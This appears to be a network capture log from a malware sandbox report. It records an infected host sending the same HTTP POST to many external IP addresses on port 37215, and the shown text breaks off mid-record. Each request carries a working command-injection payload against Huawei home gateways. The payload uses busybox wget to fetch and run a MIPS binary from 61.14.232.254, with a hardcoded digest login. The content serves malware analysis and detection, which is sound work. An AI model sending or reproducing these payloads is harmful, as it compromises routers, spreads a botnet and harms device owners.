                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  718192.168.2.1350200119.129.95.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.374483109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  719192.168.2.1338422203.157.117.5837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.374500036 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  720192.168.2.1344770197.191.34.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.374516964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  721192.168.2.1357506157.0.212.24637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.374535084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  722192.168.2.1343908157.202.112.2137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.374556065 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  723192.168.2.1333600157.88.5.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.374574900 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  724192.168.2.1350364157.45.243.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.374702930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  725192.168.2.1337034161.94.79.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.374721050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  726192.168.2.1348192142.87.2.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.374742031 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  727192.168.2.135689441.92.32.137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.378541946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 